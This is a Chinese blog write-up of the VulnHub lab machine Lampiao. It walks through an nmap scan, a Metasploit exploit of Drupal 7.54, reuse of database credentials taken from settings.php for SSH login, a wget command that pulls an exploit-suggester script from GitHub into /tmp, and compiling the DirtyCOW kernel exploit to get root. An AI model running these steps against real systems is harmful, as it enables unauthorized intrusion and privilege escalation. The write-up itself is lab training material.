Still Shines.

VulnHub渗透笔记之Lampio1

Word count: 1.1k / Reading time: 4 min
2018/10/02 Share

前言

很简单的一题,用的还是老套路,给人的惊喜不是很多。

攻击机ip地址:192.168.1.136
靶机地址未知,使用Vmware的net模式。

信息收集

nmap扫描,发现靶机ip。

nmap -sP 192.168.1.0/24


也可以从MAC地址上确定靶机IP地址为192.168.1.129。

使用nmap进行全端口扫描,开始只是扫描了1-1000的常用端口,所以一直发现不了另一个端口:

nmap -p- 192.168.1.129


看到靶机开启了3个端口,分别是22,80,1898。

获取webshell

首先访问80端口:

虽然有东西,但是除此之外,再也没有什么发现了。

那接着访问1898端口看看,可以看到显示了一个web网页:

使用的CMS是drupal。因为drupal的题遇到过不少,所以这次的思路很清晰,可以直接找rotbots.txt。但还是先用dirb扫描一下路径,直接跳过这步的话,可能会遗漏什么。

可以看到有一个robots.txt文件。这个文件有时候起到了很大的作用。查看robots.txt里的内容:

然后,在rotbots.txt文件中,尝试一下里面的路径,这比扫描出来的要全。但是这里最主要的还是查看一个叫CHANGELOG.txt的文件,因为它记录着drupal的更新信息。查看CHANGELOG.txt文件,可以知道当前drupal的版本为7.54。

知道版本有什么用呢,当然是找当前版本的漏洞啦,接下来,开始面对“谷歌”渗透。使用谷歌搜索 drupal 7.54漏洞:

结果还是很多,这需要我们匹配当前版本进行筛选。对比之后,我选择了下面这个漏洞:

这是一个比较知名的drupal漏洞,因此成功的记录比较大。再根据漏洞编号,我们在metasploit 找到漏洞利用模块:

接着配置metsploit的exploit并运行:

可以看到我们成功的建立连接,此时拿到了webshell。

此时我们可以尽情的翻看网站里面的文件,但也不是盲目的,我们要进一步提权的话,应该需要找到有关于一些有关系统的配置文件,比如数据库连接文件,上面应该有数据库的用户名和密码。

遍历文件之后,发现在sites文件夹中发现settings.php:

打开settings.php,从里面发现了数据库连接的信息:

可以看到用户名为drupaluser和密码Vigulino,我们现在就可以连接数据库了:

输入用户名密码后,我们要看看数据库里面有哪些有价值的信息,开始查询数据库:

有两个数据库,我们进入drupal这个数据库,因为和网站相关:

接着查到了表名,在其中发现了一个名为user的表:

查询users表,发现其中有个用户名叫做:tiago

这个用户很可能是网站管理员,我们还需要进一步知道密码,但是在之前也找到一个数据库的密码,可以试一试它们配合能不能进行ssh登录:

成功登录,此时我们是tiago的权限,并不是root,那接下来就是提权了。

提权

同样的,查看目录,存在tmp文件,且有很高的权限。这也将是我们选择执行脚本的地方。
接着查看下内核版本,好找到相应的漏洞:

但是在网上找了好久,一些exploit都尝试失败,后来觉得不能这么盲目了。我们可以使用下面这一款工具。它可以自动发现机器上存在的漏洞,并自动查询匹配的exploit。github连接:https://github.com/mzet-/linux-exploit-suggester

接下来,我们把它下载到靶机的/tmp文件里,可以直接使用下面的指令:

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh


接下来开始使用了,这里首先让它有777的权限。


开始运行,开始给出了靶机的一些版本信息:


结果有许多,这里看到一个很著名的内核提权的exploit——DirtyCOW(脏牛),那就选它了:

同样使用wget下载到/tmp文件中。

执行它需要777权限,先对它进行编译。

g++ -wall –pedantic –02 –std=c++11 -pthread –o dcow 40847.cpp -lutil


接着执行它:

可以看到,exploit运行后,给了我们root密码,我们使用它登录:

成功拿到flag~

CATALOG
  1. 1. 前言
  2. 2. 信息收集
  3. 3. 获取webshell
  4. 4. 提权